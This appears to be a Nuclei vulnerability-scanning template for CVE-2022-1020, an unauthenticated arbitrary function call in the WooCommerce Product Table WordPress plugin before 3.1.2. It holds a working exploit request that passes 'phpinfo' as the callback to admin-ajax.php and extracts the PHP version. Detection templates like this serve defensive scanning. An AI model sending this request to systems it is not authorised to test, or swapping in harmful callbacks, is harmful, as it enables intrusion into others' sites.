id: CVE-2022-1020

info:
  name: Woo Product Table < 3.1.2 - Unauthenticated Arbitrary Function Call
  author: Akincibor
  severity: high
  description: The Product Table for WooCommerce (wooproducttable) WordPress plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument
  reference:
    - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1020
  classification:
    cve-id: CVE-2022-1020
  tags: wp,wp-plugin,wordpress,cve,cve2022,unauth

requests:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_key=a&perpose=update&callback=phpinfo

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'